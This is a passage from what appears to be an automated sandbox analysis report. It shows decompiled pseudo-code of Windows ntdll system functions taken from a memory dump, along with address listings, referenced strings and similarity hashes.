								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E011395D0();
										L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0112f0d3
0x0112f0d9
0x0112f0e0
0x0112f0e7
0x0112f0f2
0x0112f0f4
0x0112f0f8
0x0112f100
0x0112f108
0x0112f10d
0x0112f115
0x0112f116
0x0112f11f
0x0112f123
0x0112f124
0x0112f12c
0x0112f130
0x0112f134
0x0112f13d
0x0112f144
0x0112f14b
0x0112f152
0x0116bab0
0x0116bab0
0x0112f158
0x0112f158
0x0112f15a
0x0112f160
0x0112f165
0x0112f166
0x0112f16f
0x0112f173
0x0116baa7
0x0116baa7
0x0116baab
0x00000000
0x0112f179
0x0112f18d
0x0112f191
0x0116baa2
0x00000000
0x0112f197
0x0112f19b
0x0112f1a2
0x0112f1a9
0x0112f1af
0x0112f1b2
0x0112f1b6
0x0112f1b9
0x0112f1c4
0x0112f1d8
0x0112f1df
0x0112f1e3
0x0112f1eb
0x0112f1ee
0x0112f1f4
0x0112f20f
0x0116bab7
0x0116babb
0x0116bacc
0x0116bad1
0x0112f215
0x0112f218
0x0112f226
0x0112f22b
0x00000000
0x0112f22b
0x0112f1f6
0x0112f1f6
0x0112f1f9
0x0112f1fb
0x0112f1fb
0x0112f1f4
0x0112f191
0x0112f173
0x0112f152
0x0112f203

Strings

@, xrefs: 0112F124

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 012cb0d723113998ad76787235c35e6912666570f019aa883cddf548241c0ff5
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: EB51AD712047119FC324CF18C840A6BBBF8FF98714F108A2EFA9587690E7B4E911CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01173540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01173540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x11ed360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01130BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01173706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0113FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01173540;
						E0113FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0114DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01180C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E011397C0();
					}
					return E0113B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01173971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01173884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0113FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01139650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01173787(_a4,  &_v352, _t80);
						}
					}
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E011395D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01173552
0x0117355a
0x0117355d
0x01173566
0x01173567
0x0117357e
0x0117358f
0x011735a1
0x011735a5
0x0117366b
0x0117366b
0x0117366d
0x01173672
0x01173679
0x01173685
0x0117368d
0x0117369d
0x011736a7
0x011736b8
0x011736c6
0x011736c7
0x011736dc
0x011736e1
0x011736e7
0x011736e9
0x011736e9
0x01173703
0x01173703
0x011735b5
0x011735c0
0x011735c4
0x00000000
0x00000000
0x011735ca
0x011735d7
0x011735e2
0x011735e6
0x011735e8
0x011735f5
0x011735fa
0x01173603
0x01173604
0x01173609
0x0117360a
0x01173612
0x01173613
0x0117361e
0x01173622
0x01173628
0x0117362f
0x0117362f
0x01173636
0x01173638
0x0117363b
0x01173642
0x01173642
0x01173636
0x01173657
0x01173657
0x0117365c
0x01173662
0x01173669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0117358F

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: b948d43634f73d9433d6610b55243310df454e2fa1ce59d25e515480dc6ed310
Instruction ID: 80ec98cceaf0d4f7c3d3dbb2e642606a1dc0f170a16d5a62f78214c988464797
Opcode Fuzzy Hash: b948d43634f73d9433d6610b55243310df454e2fa1ce59d25e515480dc6ed310
Instruction Fuzzy Hash: 264152B2D1052D9BDB25DA50CC80FEEB77CAB44718F0045A5EA18AB240DB309F89DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 011C05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E011C05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E011C07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01139730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E011BA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E011BA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E011C1293(_t79, _v40, E011C07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01117D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E011B138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x011c05c5
0x011c05ca
0x011c05d3
0x011c06db
0x011c06db
0x011c06dd
0x011c06e3
0x011c06e3
0x011c05dd
0x011c05e7
0x011c05f6
0x011c0600
0x011c0607
0x011c0610
0x011c0615
0x011c061a
0x011c061c
0x011c061e
0x011c0624
0x011c0625
0x011c0627
0x011c0628
0x011c0631
0x011c0640
0x011c064d
0x011c0654
0x011c0654
0x011c0631
0x011c066d
0x011c0674
0x00000000
0x00000000
0x011c0692
0x011c069e
0x011c06b0
0x011c06a0
0x011c06a9
0x011c06a9
0x011c06b8
0x011c06d6
0x011c06d6
0x00000000

Strings

`, xrefs: 011C0633

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 97d38cffbd5c8f3991c2d5476607290cb271ade2ad11d861fe2815f41e98b4e5
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: CF312632200316ABE714DE28CC85F977BD9EBD8B58F144228FA44DB6C0D770E904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01173884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01173884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01139650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01114620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01139650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01173893
0x01173896
0x01173899
0x0117389f
0x011738a0
0x011738a4
0x011738a9
0x011738ac
0x011738ad
0x011738ae
0x011738af
0x011738b1
0x011738b4
0x011738bb
0x011738bc
0x011738bd
0x011738c4
0x011738c8
0x011738ca
0x011738ca
0x011738d5
0x0117393e
0x01173940
0x01173942
0x01173952
0x01173954
0x01173961
0x01173961
0x01173967
0x0117396e
0x0117396e
0x01173947
0x0117394c
0x00000000
0x0117394c
0x011738ea
0x011738ee
0x011738f8
0x011738f9
0x011738ff
0x01173900
0x01173902
0x01173903
0x0117390b
0x0117390f
0x01173950
0x00000000
0x01173950
0x01173915
0x0117391d
0x0117391d
0x01173922
0x01173926
0x00000000
0x01173928
0x0117392b
0x0117392b
0x01173935
0x01173937
0x01173937
0x00000000
0x01173935
0x01173926
0x011738f0
0x00000000

Strings

BinaryName, xrefs: 011738B4

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 1c936569faea8a090f2990a7ef270c503813a5d217a84c11e634fe54c0ae7e26
Instruction ID: 3588a3eddf17a6bd4b2953ff00eb243ae4d02a26701271337b0fbc272644ffc0
Opcode Fuzzy Hash: 1c936569faea8a090f2990a7ef270c503813a5d217a84c11e634fe54c0ae7e26
Instruction Fuzzy Hash: D131057290150AEFEB1DDA58C945EABFB74FB80B20F114169E924A7380E7309E00E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0112D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0112D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x11ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01114120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0113B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E011398D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E011395D0();
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0112d29c
0x0112d2a6
0x0112d2b1
0x0112d2b5
0x0112d2b6
0x0112d2bc
0x0112d2bd
0x0112d2be
0x0112d2bf
0x0112d2c2
0x0112d2c4
0x0112d2cc
0x0112d384
0x0112d34b
0x0112d34f
0x0112d350
0x0112d351
0x0112d35c
0x0112d35c
0x0112d2d6
0x0112d2da
0x0112d2e1
0x0112d361
0x0112d369
0x0112d36d
0x0112d2e3
0x0112d2e3
0x0112d2e3
0x0112d2e5
0x0112d2ed
0x0112d2f5
0x0112d2fa
0x0112d302
0x0112d303
0x0112d30b
0x0112d30f
0x0112d313
0x0112d318
0x0112d31c
0x0112d320
0x0112d379
0x0112d37d
0x00000000
0x00000000
0x0116affe
0x0116b001
0x0116b011
0x00000000
0x0112d322
0x0112d322
0x0112d330
0x0112d337
0x0112d35d
0x0112d339
0x0112d33f
0x0112d38c
0x0112d38c
0x0112d33f
0x0112d349
0x00000000
0x0112d349

Strings

@, xrefs: 0112D303

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 2cb0597ff53ecb85948da90e78fcbe1cd47d6302a39cd094a998230995019fa1
Instruction ID: 98d63ac9f9048c3f5db16409651db7cd50f79ea2fd1d8521e768c962e127d37a
Opcode Fuzzy Hash: 2cb0597ff53ecb85948da90e78fcbe1cd47d6302a39cd094a998230995019fa1
Instruction Fuzzy Hash: 47318DB550C3159FCB19DF68E8809ABBBE8EB85654F01092EF99493250D734DD14CB93

Uniqueness

Uniqueness Score: -1.00%

Function 01101B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01101B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0113BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0113A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0113A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01114620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01101b8f
0x01101b9a
0x01101b9c
0x01101b9e
0x01101ba3
0x01157010
0x01157010
0x00000000
0x01101ba9
0x01101ba9
0x01101bae
0x00000000
0x01101bc5
0x01101bca
0x01101bcf
0x01101bd0
0x01101bd1
0x01101bd2
0x01101bd6
0x01101bdc
0x01101be0
0x01156ffc
0x01157000
0x00000000
0x01157006
0x01157009
0x01157009
0x01101be6
0x01101bec
0x01101c0b
0x01101c0b
0x01101c0c
0x01101c11
0x01101c12
0x01101c15
0x01101c1b
0x01101c1f
0x01101c31
0x01101c33
0x01157026
0x01157026
0x01101c21
0x01101c24
0x01101c24
0x01101bee
0x01101bee
0x01101bf2
0x01101c3a
0x01101bf4
0x01101bf4
0x01101c05
0x01101c05
0x01101c09
0x01101c3e
0x00000000
0x00000000
0x00000000
0x01101c09
0x01101bec
0x01101be0
0x01101bae
0x01101c2e

Strings

WindowsExcludedProcs, xrefs: 01101BC5

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: fdf3984c868d9dbd675c2d1c7c8eacecab47245c120dfb2f53b419216895850b
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 8821253A900228FBDB2F9A598940F9BBBADAF81B10F064425FE149B240D778DD00C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0111F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0111F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0111f71d
0x0111f722
0x0111f726
0x01164770
0x0111f765
0x0111f769
0x0111f769
0x0111f732
0x0116477a
0x00000000
0x0116477a
0x0111f738
0x0111f73a
0x0111f73c
0x0111f73f
0x0111f746
0x0111f778
0x0111f7a9
0x0111f7a9
0x0111f754
0x0111f75a
0x0111f75d
0x0111f75f
0x0111f761
0x0111f76f
0x0111f771
0x0111f771
0x0111f76f
0x0111f763
0x00000000
0x0111f763
0x0111f77d
0x0111f7a3
0x0111f7a5
0x00000000
0x0111f7a5
0x0111f77f
0x0111f782
0x0111f784
0x0111f786
0x00000000
0x00000000
0x00000000
0x0111f788
0x0111f748
0x0111f74d
0x0111f78d
0x0111f793
0x0111f7b7
0x0111f7bc
0x00000000
0x0111f7bc
0x0111f798
0x00000000
0x00000000
0x0111f79d
0x0111f7b0
0x00000000
0x0111f7b0
0x0111f79f
0x00000000
0x0111f74f
0x0111f74f
0x00000000
0x0111f74f

Strings

Actx , xrefs: 0111F73F

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 46dbe4374ea50bcbf08adcb66e72adf6b1021f43da44feca458a099380dac064
Instruction ID: 054aaa4f4f7bc91c6c8db1371979240432d3684d138e0bb0c552665d673fb4f7
Opcode Fuzzy Hash: 46dbe4374ea50bcbf08adcb66e72adf6b1021f43da44feca458a099380dac064
Instruction Fuzzy Hash: 9C110834304F438BF72D4E1CC494736F696EB85224F26453AE562CB3A9D770C80B8342

Uniqueness

Uniqueness Score: -1.00%

Function 011A8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E011A8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x11d0d50);
				E0114D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01185720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0114DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0114DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0114D130(_t34, _t39, _t40);
			}

0x011a8df1
0x011a8df1
0x011a8df1
0x011a8df1
0x011a8df1
0x011a8df1
0x011a8df3
0x011a8df8
0x011a8dfd
0x011a8e00
0x011a8e0e
0x011a8e2a
0x011a8e36
0x011a8e38
0x011a8e3c
0x011a8e46
0x011a8e46
0x011a8e36
0x011a8e50
0x011a8e56
0x011a8e59
0x011a8e5c
0x011a8e60
0x011a8e67
0x011a8e6d
0x011a8e73
0x011a8e74
0x011a8eb1
0x011a8ebd

Strings

Critical error detected %lx, xrefs: 011A8E21

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: eb340a0413f01e6e673429449e3bd39b9bd389892733048836c3b6c8b415b271
Instruction ID: 861646f9c4dc60a204417e08e9ae6a5e63ba75b74ad9ff17aeeadd40504f1ec5
Opcode Fuzzy Hash: eb340a0413f01e6e673429449e3bd39b9bd389892733048836c3b6c8b415b271
Instruction Fuzzy Hash: 79118775D10348EBDF2CDFA8950979CBFB0BB14715F20825EE669AB282C3310602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0118FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0118FF60

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 450eadcd10e1bde3682d6020bc874f4c027aafbb2ffaea12c29405f2245d690f
Instruction ID: 56b802510521eece3d6b8e0b15be00860de2f69ca965b5ee1d77d8defd512fa5
Opcode Fuzzy Hash: 450eadcd10e1bde3682d6020bc874f4c027aafbb2ffaea12c29405f2245d690f
Instruction Fuzzy Hash: 8711E172910545EFEF2AEB94C948F987BB2FB18B18F14C054F5086B1A1C7399951CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011C5BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832ee4f64b0fc643035c6374c1579f8c80439bc8d24ba00cd1e677dc405c238d
Instruction ID: 245e931dc8fc8a9beb18c48281e7fd511a6e23fee1136f507e1508aefafad421
Opcode Fuzzy Hash: 832ee4f64b0fc643035c6374c1579f8c80439bc8d24ba00cd1e677dc405c238d
Instruction Fuzzy Hash: F0425B71A00229CFDB68CF68C880BA9BBB1FF55704F1581AED94DAB342D734A985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01114120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b048c8d7703ccb675428fc89ffa679114d844fcda8b6826d7adb7ce5d1257588
Instruction ID: 08033920343da97b479bc80a2ed30e4ccbed26e10c98719f89b0cb6cf0014e6e
Opcode Fuzzy Hash: b048c8d7703ccb675428fc89ffa679114d844fcda8b6826d7adb7ce5d1257588
Instruction Fuzzy Hash: 82F17C70A08211CFD76CCF19C480A7AF7E1AF88B54F05492EF996CBA94E734D981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 011220A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.380101220.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6463a2ba138d145289e659cd3761acc5b673faec1b1b544ff5b453d9448f5ed
